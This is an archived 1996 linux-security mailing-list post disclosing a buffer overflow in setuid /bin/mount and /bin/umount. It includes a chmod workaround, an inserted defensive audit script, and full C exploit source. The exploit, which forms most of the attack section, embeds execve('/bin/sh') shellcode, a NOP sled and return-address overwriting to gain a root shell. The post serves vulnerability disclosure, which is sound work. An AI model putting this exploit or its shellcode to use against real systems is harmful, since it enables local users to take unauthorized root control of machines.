[1000] in linux-security and linux-alert archive


[linux-security] Vulnerability in ALL linux distributions

daemon@ATHENA.MIT.EDU (bloodmask)
Tue Aug 13 11:55:38 1996

Date: Tue, 13 Aug 1996 06:49:55 +0200
From: bloodmask <bloodmask@mymail.com>
To: linux-security@tarsier.cv.nrao.edu
CC: linux-alert@tarsier.cv.nrao.edu


Greetings folks,
Sorry we haven't released this thing sooner, due to testing we've
conducted to determine vulnerability on other systems besides Linux.
I've attached the official release. Patch this up quick, and if I were
you, I wouldn't trust those old binaries to be secure anymore. This
thing has been with Linux since its beginning, and it's high time this
"feature" is removed.

[Attachment: cvnmount.exploit]

Covin Security Releases:
(mount bufferoverflow exploit v1.0)

Tested operating systems: All current distributions of Linux

Affect: Local users on affected systems can overflow mount's syntax
buffer and execute a shell by overwriting the stack.

Affected binaries:
(/bin/mount and /bin/umount)

Workaround:
On all current distributions of Linux remove the suid bit from /bin/mount and
/bin/umount.
[chmod -s /bin/mount;chmod -s /bin/umount]
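As an added example (not part of the original post), a small POSIX sh script that verifies whether the two binaries named in the advisory still carry the setuid bit and, when APPLY=1 is set, applies the advisory's chmod -s workaround; the function names and the APPLY switch are this script's own convention.

```shell
#!/bin/sh
# Added example, not from the original post: audit and optionally apply the
# advisory's workaround. The two paths are the ones the advisory names; the
# APPLY variable and the function names are conventions of this script.

# check_suid PATH: report the state of one file.
# Returns 0 when the file is absent or not setuid, 1 when the bit is set.
check_suid() {
    f=$1
    if [ ! -e "$f" ]; then
        printf '%s: not present\n' "$f"
        return 0
    fi
    if [ -u "$f" ]; then
        printf '%s: SETUID (still exposed per advisory)\n' "$f"
        return 1
    fi
    printf '%s: setuid bit clear\n' "$f"
    return 0
}

# strip_suid PATH: the advisory's "chmod -s", applied only when needed.
strip_suid() {
    f=$1
    [ -u "$f" ] || return 0
    chmod -s "$f"
}

# audit_mount_binaries [APPLY]: check both binaries from the advisory.
# APPLY=1 removes the bit; anything else is a dry run.
# Returns the number of binaries still setuid when the function finishes.
audit_mount_binaries() {
    apply=${1:-0}
    left=0
    for f in /bin/mount /bin/umount; do
        if ! check_suid "$f"; then
            if [ "$apply" = 1 ]; then
                strip_suid "$f" && continue
            fi
            left=$((left + 1))
        fi
    done
    return "$left"
}

audit_mount_binaries "${APPLY:-0}" || echo "setuid bit still present on $? binary(ies)"
```

Clearing the setuid bit also stops unprivileged users from using "user" entries in /etc/fstab, since the mount system call itself requires root; plan for that before applying the workaround.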

Remarks:
For God's sake, how many more times are we gonna see this kind of problem?
It's been with Linux since its very beginning, and it's so easy to
exploit. Similar buffer overflow vulnerabilities have been found in
Linux distributions many times before, splitvt, dip, just to name a few
examples.


Any remarks, notes or other forms of feedback may be redirected to: 
bloodmask@mymail.com

[Mod: This exploit has already been posted to Bugtraq.  --Jeff.]

<------------------------------[ Cut here ]---------------------------------->

/* Mount Exploit for Linux, Jul 30 1996 

::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
::::::::""`````""::::::""`````""::"```":::'"```'.g$$S$' `````````"":::::::::
:::::'.g#S$$"$$S#n. .g#S$$"$$S#n. $$$S#s s#S$$$ $$$$S". $$$$$$"$$S#n.`::::::
::::: $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ .g#S$$$ $$$$$$ $$$$$$ ::::::
::::: $$$$$$ gggggg $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$$ $$$$$$ $$$$$$ ::::::
::::: $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$$ $$$$$$ $$$$$$ ::::::
::::: $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$$ $$$$$$ $$$$$$ ::::::
::::: $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$$ $$$$$$ $$$$$$ ::::::
::::::`S$$$$s$$$$S' `S$$$$s$$$$S' `S$$$$s$$$$S' $$$$$$$ $$$$$$ $$$$$$ ::::::
:::::::...........:::...........:::...........::.......:......:.......::::::
:::::::::::::::::::::::::::::::::::::::::::::::;::::::::::::::::::::::::::::

Discovered and Coded by Bloodmask & Vio
Covin Security 1996
*/

#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>      /* memset, strlen */
#include <fcntl.h>
#include <sys/types.h>   /* u_long, u_char, u_int */
#include <sys/stat.h>

#define PATH_MOUNT "/bin/umount"
#define BUFFER_SIZE 1024
#define DEFAULT_OFFSET 50

/* Return the current stack pointer. The inline asm leaves it in %eax,
   which is the integer return register on i386, so no explicit return
   statement is needed (this relies on i386 calling conventions). */
u_long get_esp() 
{ 
  __asm__("movl %esp, %eax"); 
}

int main(int argc, char **argv)
{
  /* i386 shellcode: execve("/bin/sh") followed by exit() */
  u_char execshell[] = 
   "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
   "\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
   "\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";

   char *buff = NULL;
   unsigned long *addr_ptr = NULL;
   char *ptr = NULL;
   
   int i;
   int ofs = DEFAULT_OFFSET;
   
   buff = malloc(4096);
   if(!buff)
   {
      printf("can't allocate memory\n");
      exit(1);
   }
   ptr = buff;

   /* fill start of buffer with nops (the sled the return address lands in) */

   memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell));
   ptr += BUFFER_SIZE-strlen(execshell);

   /* stick asm code into the buffer, right after the nop sled */

   for(i=0;i < strlen(execshell);i++)
      *(ptr++) = execshell[i];

   /* append two copies of the guessed address (stack pointer + offset)
      so that the saved return address is overwritten with a pointer
      into the nop sled; the buffer is then NUL-terminated */
   addr_ptr = (unsigned long *)ptr;
   for(i=0;i < (8/4);i++)
      *(addr_ptr++) = get_esp() + ofs;
   ptr = (char *)addr_ptr;
   *ptr = 0;

   /* cancel any pending alarm before handing control to the target */
   (void)alarm((u_int)0);
   printf("Discovered and Coded by Bloodmask and Vio, Covin 1996\n");
   /* run the setuid target with the crafted argument as its only option */
   execl(PATH_MOUNT, "mount", buff, (char *)NULL);
   perror("execl");
   return 1;
}

